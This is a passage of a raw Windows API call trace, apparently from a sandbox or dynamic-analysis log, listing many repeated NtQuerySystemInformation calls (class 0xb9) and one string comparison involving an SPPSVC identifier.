(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0271.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x28, ResultLength=0x0) [0271.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x28, ResultLength=0x0) [0271.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0271.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0271.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x20, ResultLength=0x0) [0271.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4c0, Length=0x20, ResultLength=0x0) [0271.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4c0, Length=0x20, ResultLength=0x0) [0271.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4c0, Length=0x20, ResultLength=0x0) [0271.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0271.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0271.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0271.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0271.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0271.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0271.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0271.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0271.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0271.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0271.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x20, ResultLength=0x0) [0271.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x38, ResultLength=0x0) [0271.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x20, ResultLength=0x0) [0271.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0271.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5c0, Length=0x20, ResultLength=0x0) [0271.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb28, Length=0x50, ResultLength=0x0) [0271.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0271.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc880, Length=0x28, ResultLength=0x0) [0271.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc880, Length=0x28, ResultLength=0x0) [0271.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc880, Length=0x28, ResultLength=0x0) [0271.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc880, Length=0x28, ResultLength=0x0) [0271.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8f0, Length=0x28, ResultLength=0x0) [0271.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0271.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x28, ResultLength=0x0) [0271.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x28, ResultLength=0x0) [0271.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0271.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x20, ResultLength=0x0) [0271.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x20, ResultLength=0x0) [0271.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x20, ResultLength=0x0) [0271.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc850, Length=0x20, ResultLength=0x0) [0271.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca50, Length=0x38, ResultLength=0x0) [0271.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8d0, Length=0x20, ResultLength=0x0) [0271.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x20, ResultLength=0x0) [0271.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc860, Length=0x20, ResultLength=0x0) [0271.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d0, Length=0x50, ResultLength=0x0) [0271.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x38, ResultLength=0x0) [0271.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0271.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0271.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0271.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x28, ResultLength=0x0) [0271.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x28, ResultLength=0x0) [0271.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x38, ResultLength=0x0) [0271.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.038] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x28, ResultLength=0x0) [0271.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x28, ResultLength=0x0) [0271.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x38, ResultLength=0x0) [0271.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x20, ResultLength=0x0) [0271.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x20, ResultLength=0x0) [0271.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x20, ResultLength=0x0) [0271.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc700, Length=0x20, ResultLength=0x0) [0271.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc900, Length=0x38, ResultLength=0x0) [0271.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x20, ResultLength=0x0) [0271.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0271.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0271.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.042] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0271.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9b8, Length=0x50, ResultLength=0x0) [0271.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0271.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0271.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0271.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x28, ResultLength=0x0) [0271.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x28, ResultLength=0x0) [0271.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0271.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x28, ResultLength=0x0) [0271.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x28, ResultLength=0x0) [0271.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0271.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x20, ResultLength=0x0) [0271.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0271.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0271.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0271.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8e0, Length=0x38, ResultLength=0x0) [0271.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc760, Length=0x20, ResultLength=0x0) [0271.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0271.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6f0, Length=0x20, ResultLength=0x0) [0271.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x50, ResultLength=0x0) [0271.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x50, ResultLength=0x0) [0271.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x50, ResultLength=0x0) [0271.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0271.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0271.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0271.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0271.050] NtQuerySystemInformation 